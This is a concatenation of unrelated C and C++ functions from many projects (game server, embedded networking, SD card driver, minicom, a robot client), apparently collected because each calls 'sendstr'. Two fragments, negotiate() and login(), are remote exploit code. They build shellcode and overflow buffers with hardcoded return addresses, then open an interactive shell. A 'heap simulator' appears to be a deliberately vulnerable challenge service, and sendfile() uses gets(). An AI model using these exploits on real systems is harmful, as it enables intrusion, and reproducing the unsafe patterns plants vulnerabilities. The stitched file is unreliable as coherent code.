int starter::preparationThread () { // 接続を待ち、接続処理をする
sockets[0] = new Sock(portnum);
CurrentConnection = 1;
while (!terminated) {
if (sockets[0]->connected()) {
sockets[0]->putc(CurrentConnection + 1);
delete sockets[0]; sockets[0] = nullptr;
sockets[CurrentConnection] = new Sock(portnum + CurrentConnection);
sockets[CurrentConnection]->wait_until_connected(); // 接続を待つ
TCHAR tmpsignature[] = _T("[A]"); tmpsignature[1] += CurrentConnection; // 英字
playerName[CurrentConnection] = CodeConv::tstring(tmpsignature) + getString(CurrentConnection);
sockets[0] = new Sock(portnum); // 再度listen開始
++CurrentConnection;
}
if (CurrentConnection >= NumberOfPlayers) break;
threadSleep(50); // Yield
}
delete sockets[0]; sockets[0] = nullptr; // 待機用のソケットを閉じる
send(protocol::Server_StartGame_Signature);
for (unsigned int i = 0; i < NumberOfPlayers; ++i)
sendstr(playerName[i]); // 名前を送信
for (unsigned i = 0; i < RULE_LINES; ++i)
sendstr(CodeConv::EnsureTStr(ruleConf[i])); // ルールを送信
finished = true;
return 0;
}
void negotiate(int sd)
{
char buf[1024];
char nop[64];
int len;
sendstr(sd, packet_1,sizeof(packet_1));
sleep(2);
memset(buf,'\0',sizeof(buf));
memset(nop,'A',sizeof(nop));
memcpy(buf,packet_2,sizeof(packet_2));
/* adding NOP */
memcpy(buf+sizeof(packet_2), nop, sizeof(nop));
/* shellcode */
memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc));
/* left packet */
memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1));
len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ;
sendstr(sd, buf, len);
sleep(1);
/* wont echo */
wont(sd,TELOPT_ECHO);
sleep(1);
/* do echo */
cmd(sd,TELOPT_ECHO);
sleep(2);
}
void HTTPCustomStart( )
{
uint8_t i, clusterno;
struct HTTPConnection * h = curhttp;
const char * path = &h->pathbuffer[0];
sendstr( "Request: " );
sendstr( path );
sendchr( '\n' );
h->data.user.a = 5;
h->isdone = 0;
h->isfirst = 1;
}
static int handle_help(char *params)
{
sendstr(client_sock,
"load <filter> <initial string>\n"
"unload <filter>\n"
"enable <filter>\n"
"disable <filter>\n"
"config <filter> <string>\n"
"parameters <filter>\n"
"list [ load | enable | disable ]\n"
"dump\n"
"progress\n"
"pause\n"
"preview <command>\n"
" [ draw | undo | pause | fastfw |\n"
" slowfw | slowbw | rotate |\n"
" rotate | display | slower |\n"
" faster | toggle | grab ]\n"
"status\n"
"stop\n"
"help\n"
"version\n"
"quit\n"
);
return 1;
}
//nonzero indicates failure.
unsigned char endSDwrite()
{
unsigned char cc;
unsigned char timeout = 200;
dumpSD( opsleftSD );
microSPID(); //CRCA
//XXX Warning, the 50us wait in this function could be too low. if it's at 10,
//you will have write issues.
do
{
_delay_us(50);
cc = microSPIR();
}
while ( --timeout && cc == 0xff );
timeout = 200;
if( (cc & 0x0f) != 0x05 )
{
dumpSD(3);
SDCSDE;
sendstr( "write failed.\n" );
return 2;
}
//Wait for read to complete.
while( microSPIR() != 0xFF && timeout-- ) _delay_us(50);
SDCSDE;
return 0;
}
void
sendfile()
{
char file[256];
FILE *fp;
int x;
char spin[] = "/-\\|";
tcsetattr(0, TCSANOW, &savetty);
printf("File name to send > ");
fflush(stdout);
if (gets(file) == 0) {
tcsetattr(0, TCSANOW, &rawtty);
return;
}
fp = fopen(file, "r");
if (fp == 0) {
perror("fopen");
fprintf(stderr, "ERROR: file <%s> does not exist?\n", file);
tcsetattr(0, TCSANOW, &rawtty);
return;
}
printf("Sending file <%s>\n", file);
x = 0;
while (fgets(file, sizeof(file), fp) != 0) {
backspace();
usleep(1400);
sendstr(file);
write(1, &spin[x], 1);
x = (x + 1) & 3;
}
tcsetattr(0, TCSANOW, &rawtty);
}
/**
* synchronizes card number
* Inputs: NONE
* Return: 0 if success
*/
int syncCardNum(){
char cn[3];
cn[0]=sramread(CHNP)|0x40;
cn[1]=sramread(CHNP+1)|0x40;
cn[2]=sramread(CHNP+2)|0x40;
sendchar(4|0x40);
usleep(10000);
sendstr(3, cn);
return 0;
}
void netspool_query(s_netspool_state *state, const char *what)
{
char strbuf[STRBUF];
int r;
snprintf(strbuf, STRBUF, "GET %s", what); /* ALL or comma separated NETMAIL, ECHOMAIL... */
r = sendstr(state->socket, strbuf);
if( r ) {
state->state = NS_ERROR;
state->error = "IO error";
return;
}
state->state = NS_RECEIVING;
}
static int handle_parameter(char *params)
{
int filter_id;
const char *s;
filter_id = tc_filter_find(params);
if (!filter_id)
return 0;
s = tc_filter_get_conf(filter_id, NULL);
if (!s)
return 0;
sendstr(client_sock, s);
return 1;
}
void TCPConnectionClosing( uint8_t conn )
{
if( conn >= HTTP_CONNECTIONS )
{
sendstr( "LOSC\n" );
RemovePlayer( conn - HTTP_CONNECTIONS - 1 );
}
#ifndef NO_HTTP
else
{
curhttp = &HTTPConnections[conn-1];
HTTPClose( );
}
#endif
}
static int handle_list(char *params)
{
const char *list = NULL;
if (strncasecmp(params, "load", 2) == 0)
list = tc_filter_list(TC_FILTER_LIST_LOADED);
else if (strncasecmp(params, "enable", 2) == 0)
list = tc_filter_list(TC_FILTER_LIST_ENABLED);
else if (strncasecmp(params, "disable", 2) == 0)
list = tc_filter_list(TC_FILTER_LIST_DISABLED);
if (list) {
sendstr(client_sock, list);
return 1;
} else {
return 0;
}
}
void netspool_acknowledge(s_netspool_state *state)
{
char strbuf[STRBUF];
int r;
if( state->length > 0 ) {
state->state = NS_ERROR;
state->error = "Too early acknowledgement";
return;
}
snprintf(strbuf, STRBUF, "DONE %s", state->filename);
r = sendstr(state->socket, strbuf);
if( r ) {
state->state = NS_ERROR;
state->error = "IO error";
return;
}
state->state = NS_RECEIVING;
state->filename[0] = 0;
}
/**
* For two-way communication with the Nav2 machine, this function sends msg to
* the Nav2 device and waits to recieve a response.
* @param msg The message to send to the Nav2 machine.
* @param buffer_size Optionally, you can specify a buffer size. The default
* is only 128, so you can bump it up to decrease the turns through recieving
* loop.
* @return Returs the string recieved from the Nav2 machine.
*/
std::string VmeNmpc::send_recv(std::string msg, int buffer_size) {
// const int buffer_size = ;
if (sendstr(msg) < 0)
throw std::runtime_error(
"Failed to write to Nav2 machine during send_recv. msg: " + msg);
std::vector<char> buffer(buffer_size);
std::string recieved_message;
int bytes_received{0};
do {
bytes_received = recv(sockfd, buffer.data(), buffer.size(), 0);
if (bytes_received < 0)
throw std::runtime_error(
"Failed to read from Nav2 machine during pose update. msg: " + msg);
else
recieved_message.append(buffer.cbegin(), buffer.cend());
} while (bytes_received == buffer_size);
return recieved_message;
}
uint8_t TCPReceiveSyn( uint16_t portno )
{
if( portno == MINECRAFT_PORT ) //Must bump these up by 8...
{
uint8_t ret = GetFreeConnection();//MyGetFreeConnection(HTTP_CONNECTIONS+1, TCP_SOCKETS );
if( ret == 0 ) return 0;
sendstr( "Conn attempt: " );
sendhex2( ret );
sendchr( '\n' );
AddPlayer( ret - HTTP_CONNECTIONS - 1 );
return ret;
}
#ifndef NO_HTTP
else if( portno == 80 )
{
uint8_t ret = MyGetFreeConnection(1, HTTP_CONNECTIONS+1 );
// sendchr( 0 ); sendchr( 'x' ); sendhex2( ret );
HTTPInit( ret-1, ret );
return ret;
}
#endif
return 0;
}
int VmeNmpc::at(float x, float y, float tol) {
std::string msg = "AT " + std::to_string(x) + ' ' + std::to_string(y) + ' ' +
std::to_string(tol) + '\n';
return sendstr(msg);
}
void netspool_end(s_netspool_state *state)
{
sendstr(state->socket, "END satisfied");
close(state->socket);
state->state = NS_NOTINIT;
}
void invalid_command(void)
{
sendstr(tokenptrs[0]);
sendstr_P(PSTR(": not found"));
}
unsigned char initSD()
{
/// unsigned char i = 0;
unsigned char tries = 0;
restart:
SDPORT &= ~SDCLK;
SDPORT |= SDMOSI;
SDDDR |= SDCLK | SDMOSI;
SDDDR &= ~SDMISO;
SDCSDE;
dumpSD(10);
_delay_ms(1);
SDCSEN;
_delay_us(50);
microSPIW( 0x40 ); microSPIW( 0x00 ); microSPIW( 0x00 );
microSPIW( 0x00 ); microSPIW( 0x00 ); microSPIW( 0x95 );
if( WaitFor( 1 ) )
{
//Up to three tries to get sync'd.
SDCSDE;
if( tries++ < 10 )
goto restart;
sendstr( "Failure finding SD card.\n" );
SDCSDE;
return 1;
}
//Card is present!
reCS();
//XXX Yucky work-around, we have to tell the host we support high-capacity cards.
microSPIW(0x48); // CMD8
microSPIW(0x00); //
microSPIW(0x00);
microSPIW(0x01); // HVS
microSPIW(0xAA); // test pattern
microSPIW(0x87); // right checksum for CMD8
dumpSD( 6 );
sendcmd1:
reCS();
microSPIW(0x77); // CMD55
microSPIW(0x00);
microSPIW(0x00);
microSPIW(0x00);
microSPIW(0x00);
dumpSD( 3 );
reCS();
//the 0x40 supposadly tells the card that not just SD, but SDHC is OK!
microSPIW( 0x69 ); microSPIW( 0x40 ); microSPIW( 0x00 ); //CMD41?
microSPIW( 0x00 ); microSPIW( 0x00 ); microSPID();
//sendstr( "CK" );
if( WaitFor( 0 ) )
{
//Up to three tries to get sync'd.
if( tries++ < 100 )
goto sendcmd1;
sendstr( "No init.\n" );
SDCSDE;
return 1;
}
//Card is basically set up!
reCS();
microSPIW( 0x50 ); microSPIW( 0x00 ); microSPIW( 0x00 ); //Use 512-byte block reads. //CMD16
microSPIW( 0x02 ); microSPIW( 0x00 ); microSPIW( 0x01 );
dumpSD(3);
reCS();
//Check capacity (we don't know if we are using low or high capacity addressing mode)
microSPIW( 0x7a ); //CMD58 (read OCR)
dumpSD( 7 );
if( microSPIR() & 0x40 ) //TODO Should I make sure it's not 0xff?
{
highcap = 1;
}
else
{
highcap = 0;
}
dumpSD(3);
SDCSDE;
sendstr( "Card OK.\n" );
return 0;
}
void netspool_start(s_netspool_state *state, const char *host, const char *port, const char *addresses, const char *password)
{
int s, r;
struct addrinfo hint;
struct addrinfo *addrs, *a;
char strbuf[STRBUF];
s = socket(AF_INET6, SOCK_STREAM, 0);
state->socket = s;
if( s==-1 )
{
state->state = NS_ERROR;
state->error = "socket error";
return;
}
memset(&hint, 0, sizeof(struct addrinfo));
hint.ai_socktype = SOCK_STREAM;
hint.ai_family = PF_INET6;
hint.ai_flags = AI_V4MAPPED;
r = getaddrinfo(host, port!=NULL? port: "24555", &hint, &addrs);
if( r ) {
state->state = NS_ERROR;
state->error = gai_strerror(r);
return;
}
a=addrs;
r=-1;
while(a) {
r = connect(s, a->ai_addr, a->ai_addrlen);
if(r==-1) {
//printf("%d %s\n", errno, strerror(errno));
;
} else {
break;
}
a=a->ai_next;
}
freeaddrinfo(addrs);
if(r==-1) {
state->state = NS_ERROR;
state->error = "could not connect";
return;
}
r = readstr(s, strbuf, STRBUF);
if( r ) {
state->state = NS_ERROR;
state->error = "IO error";
return;
}
//puts(strbuf); -- hello from remote
while (*addresses) { // stop when zero length string under pointer
snprintf(strbuf, STRBUF, "ADDRESS %s", addresses);
r = sendstr(s, strbuf);
if( r ) {
state->state = NS_ERROR;
state->error = "IO error";
return;
}
addresses += strlen(addresses)+1; // go to next string
}
snprintf(strbuf, STRBUF, "PASSWORD %s", password);
r = sendstr(s, strbuf);
if( r ) {
state->state = NS_ERROR;
state->error = "IO error";
return;
}
state->state = NS_READY;
}
void tc_socket_submit(const char *str)
{
if (socket >= 0)
sendstr(client_sock, str);
}
void enc424j600_receivecallback( uint16_t packetlen )
{
uint8_t is_the_packet_for_me = 1;
unsigned char i;
unsigned char ipproto;
//First and foremost, make sure we have a big enough packet to work with.
if( packetlen < 8 )
{
#ifdef ETH_DEBUG
sendstr( "Runt\n" );
#endif
return;
}
//macto (ignore) our mac filter handles this.
enc424j600_dumpbytes( 6 );
POPB( macfrom, 6 );
//Make sure it's ethernet!
if( POP != 0x08 )
{
#ifdef ETH_DEBUG
sendstr( "Not ethernet.\n" );
#endif
return;
}
//Is it ARP?
if( POP == 0x06 )
{
HandleArp( );
return;
}
//otherwise it's standard IP
//So, we're expecting a '45
if( POP != 0x45 )
{
#ifdef ETH_DEBUG
sendstr( "Not IP.\n" );
#endif
return;
}
POP; //differentiated services field.
iptotallen = POP16;
enc424j600_dumpbytes( 5 ); //ID, Offset+FLAGS+TTL
ipproto = POP;
POP16; //header checksum
POPB( ipsource, 4 );
for( i = 0; i < 4; i++ )
{
unsigned char m = ~MyMask[i];
unsigned char ch = POP;
if( ch == MyIP[i] || (ch & m) == 0xff ) continue;
is_the_packet_for_me = 0;
}
//Tricky, for DHCP packets, we have to detect it even if it is not to us.
if( ipproto == 17 )
{
remoteport = POP16;
localport = POP16;
#ifdef ENABLE_DHCP_CLIENT
if( localport == 68 && !dhcp_seconds_remain )
{
HandleDHCP( POP16 );
return;
}
#endif
}
if( !is_the_packet_for_me )
{
#ifdef ETH_DEBUG
sendstr( "not for me\n" );
#endif
return;
}
//XXX TODO Handle IPL > 5 (IHL?)
switch( ipproto )
{
case 1: //ICMP
HandleICMP();
break;
#ifdef INCLUDE_UDP
case 17:
{
//err is this dangerous?
HandleUDP( POP16 );
break;
}
#endif
#ifdef INCLUDE_TCP
case 6: // TCP
{
remoteport = POP16;
localport = POP16;
iptotallen-=20;
HandleTCP( iptotallen );
break;
}
#endif // HAVE_TCP_SUPPORT
default:
break;
}
//finishcb:
// enc424j600_finish_callback_now();
}
/*
* Main program of keyserv.
*/
int main(int argc, char **argv)
{
int c;
char ch;
int f, fun;
int stopped = 0;
if (argc < 2 || (parent = atoi(argv[1])) == 0) {
printf("Usage: %s <parent>\n", *argv);
exit(1);
}
/* Initialize signal handlers */
/* signal(SIGHUP, SIG_IGN); */
signal(SIGQUIT, SIG_IGN);
signal(SIGINT, SIG_IGN);
#ifdef SIGTSTP
signal(SIGTSTP, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGTTOU, SIG_IGN);
#endif
signal(HELLO, handler);
/* Set up escape sequence table */
escseq = st_vtesc;
/* Cbreak, no echo (minicom itself sets to raw if needed) */
setcbreak(1);
if ((fun = setjmp(mainloop)) != 0) {
switch (fun) {
/* We come here after minicom has told us something */
case KVT100: /* VT100 keyboard */
mode = EVT100;
escseq = st_vtesc;
break;
case KANSI: /* ANSI keyboard */
mode = EANSI;
escseq = ansiesc;
break;
case KKPST: /* Keypad in standard mode, not used */
keypadmode = NORMAL;
break;
case KKPAPP: /* Keypad in applications mode, not used */
keypadmode = APPL;
break;
case KCURST: /* Standard cursor keys */
cursormode = NORMAL;
if (mode == EVT100)
escseq = st_vtesc;
break;
case KCURAPP: /* cursor keys in applications mode */
cursormode = APPL;
if (mode == EVT100)
escseq = app_vtesc;
break;
case KSTOP: /* Sleep until further notice */
stopped = 1;
break;
case KSIGIO: /* Wait for keypress and tell parent */
kill(parent, ACK);
f = read(0, &ch, 1);
if (f == 1) {
write(to_minicom, &ch, 1);
kill(parent, HELLO);
}
break;
case KSTART: /* Restart when stopped */
stopped = 0;
break;
case KSETBS: /* Set code that BS key sends */
bs_code = argument;
break;
case KSETESC: /* Set escape character */
esc_char = argument;
break;
default:
break;
}
if (fun != KSIGIO)
kill(parent, ACK);
}
/* Wait if stopped */
if (stopped)
pause();
/* Main loop: read keyboard, send to modem */
while (1) {
c = wxgetch();
if (c > 256 && c < 256 + NUM_KEYS) {
sendstr(escseq[c - 256]);
}
if (c < 256) {
if (c == K_ERA)
c = bs_code;
ch = c;
/* Test for escape characters */
if (c == esc_char || (esc_char == 128 && c > 128)) {
/* If we typed too fast, and the escape sequence
* was not that of a function key, the next key
* is already in the buffer.
*/
if (c == esc_char && pendingkeys > 0) {
ch = wxgetch();
}
write(to_minicom, &ch, 1);
kill(parent, HELLO);
} else {
write(1, &ch, 1);
}
}
}
return 0;
}
static int handle(char *buf)
{
TCSession *session = tc_get_session();
char *cmd, *params;
int len, retval;
len = strlen(buf);
if (len > 0 && buf[len-1] == '\n')
buf[--len] = 0;
if (len > 0 && buf[len-1] == '\r')
buf[--len] = 0;
//tc_log_msg(__FILE__, "read from socket: |%s|", buf);
cmd = buf + strspn(buf, " \t");
params = cmd + strcspn(cmd, " \t");
*params++ = 0;
params += strspn(params, " \t");
if (!*cmd) { // not strictly necessary, but lines up else if's nicely
retval = 0;
} else if (strncasecmp(cmd, "config", 2) == 0) {
retval = handle_config(params);
} else if (strncasecmp(cmd, "disable", 2) == 0) {
retval = handle_disable(params);
} else if (strncasecmp(cmd, "dump", 2) == 0) {
dump_vob(client_sock);
retval = 1;
} else if (strncasecmp(cmd, "enable", 2) == 0) {
retval = handle_enable(params);
} else if (strncasecmp(cmd, "help", 2) == 0) {
retval = handle_help(params);
} else if (strncasecmp(cmd, "list", 2) == 0) {
retval = handle_list(params);
} else if (strncasecmp(cmd, "load", 2) == 0) {
retval = handle_load(params);
} else if (strncasecmp(cmd, "parameters", 3) == 0) {
retval = handle_parameter(params);
} else if (strncasecmp(cmd, "pause", 3) == 0) {
tc_pause_request();
retval = 1;
} else if (strncasecmp(cmd, "preview", 3) == 0) {
retval = handle_preview(params);
} else if (strncasecmp(cmd, "progress", 5) == 0) {
session->progress_meter = !session->progress_meter;
retval = 1;
} else if (strncasecmp(cmd, "processing", 10) == 0) {
dump_processing(client_sock);
retval = 1;
} else if (strncasecmp(cmd, "quit", 2) == 0
|| strncasecmp(cmd, "exit", 2) == 0) {
return 0; // tell caller to close socket
} else if (strncasecmp(cmd, "unload", 2) == 0) {
retval = 0; // FIXME: not implemented
} else if (strncasecmp(cmd, "version", 2) == 0) {
sendstr(client_sock, PACKAGE_VERSION "\n");
retval = 1;
} else if (strncasecmp(cmd, "stop", 4)) {
tc_interrupt();
tc_framebuffer_interrupt();
retval = 1;
} else {
retval = 0;
}
sendstr(client_sock, retval ? "OK\n" : "FAILED\n");
return 1; // socket remains open
}
int VmeNmpc::clear_targets() { return sendstr("\nCLEAR ALL\n"); }
/**
* Takes a command to be sent to the Nav2 machine, adds a new line to the end
* if it isn't already there and sends it. This function doesn't do a lot of
* checking, so if there is a preexisting \n, it has to be the last character
* in msg, otherwise, it isn't detected.
* @param msg The message to be sent.
*/
int VmeNmpc::sendline(std::string cmd) {
if (cmd.back() == '\n')
return sendstr(cmd);
else
return sendstr(cmd + '\n');
}
void handle_request(void) {
void *allocs[100] = {0};
uint32_t alloc_idx;
sendstr(" **** WELCOME TO THE HEAP SIMULATOR 2001! ****\n\n");
while (1) {
sendstr("What would you like to do?\n");
sendstr(" 1) Allocate memory\n");
sendstr(" 2) Free memory\n");
sendstr(" 3) Read some data\n");
sendstr(" 4) Exit\n\n");
int cmd = readint();
uint16_t id;
switch (cmd) {
case 1:
for (alloc_idx = 0; alloc_idx < sizeof(allocs) && allocs[alloc_idx] != NULL; ++alloc_idx) ;
if (alloc_idx >= sizeof(allocs)) {
sendstr("Run out of space, free something first!\n");
} else {
sendstr("Ok, how much memory do you want (in bytes)?\n");
uint16_t bytes = readint();
allocs[alloc_idx] = (void *)alloc(bytes);
sendstr(tprintf("Allocated with ID = %d\n", alloc_idx));
}
dump_heap();
break;
case 2:
sendstr("Please enter the ID of the alloc to free\n");
id = readint();
if (id < sizeof(allocs) && allocs[id] != NULL) {
dealloc(allocs[id]);
allocs[id] = NULL;
} else {
sendstr("Alloc not found\n");
}
dump_heap();
break;
case 3:
sendstr("Please enter the ID of the alloc where to read data\n");
id = readint();
if (id < sizeof(allocs) && allocs[id] != NULL) {
sendstr("Ready! Send the data\n");
recvline(client_fd, allocs[id], 0x100);
} else {
sendstr("Alloc not found\n");
}
dump_heap();
break;
case 4:
say_bye();
exit(0);
break;
default:
sendstr("What!?\n");
};
}
}
void login(int sd)
{
char buf[1024];
char exploit_buf[172];
char cx[3]="\r\n\0";
int x;
fd_set rset;
memset(exploit_buf,'\0',172);
/* let's jump to 0xbffffe30 */
/* eb 30 fe ff bf */
x = 0;
exploit_buf[x++]=0x68;
/* push 0xbffffe30 */
/* shellcode address */
exploit_buf[x++]=0x30;
exploit_buf[x++]=0xfe;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xff;
exploit_buf[x++]=0xbf;
exploit_buf[x++]=0xbf;
/* ret */
exploit_buf[x++]=0xc3;
memset(exploit_buf+x,'A',150);
x+=150;
/* will jmp in the middle of the NOP */
/* overwrite the eip with 0x40000f4f libc-2.3.2 */
/* at this address it is
pop $exx
pop $exx
ret
*/
exploit_buf[x++]=0xb5;
exploit_buf[x++]=0xd4;
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, "xie\r\n\0");
printf("[*] sending username \n");
sendstr(sd,buf,strlen(buf));
sleep(1);
printf("[*] sending password\n");
sleep(2);
memset(buf,'\0',sizeof(buf));
strcpy(buf, exploit_buf);
strcat(buf,"\r\n\0");
sendstr(sd,buf,strlen(buf));
sleep(2);
fflush(stdout);
FD_ZERO(&rset);
while (1)
{
FD_SET(sd,&rset);
FD_SET(0,&rset);
select(sd+1,&rset,0,0,0);
if (FD_ISSET(sd,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(sd,buf,sizeof(buf)-1)) == 0)
{
printf("Connection closed by foreign host.\n");
exit(-1);
}
fprintf(stderr,"%s",buf);
}
if (FD_ISSET(0,&rset))
{
memset(buf,'\0',sizeof(buf));
if ((x = read(0,buf,sizeof(buf)-1)) > 0)
{
write(sd,buf,x);
}
}
}
}
void ForcePlayerClose( uint8_t playerno, uint8_t reason ) //DUMBCRAFT
{
sendstr( "FPC\n" );
RequestClosure( playerno + HTTP_CONNECTIONS );
RemovePlayer( playerno );
}
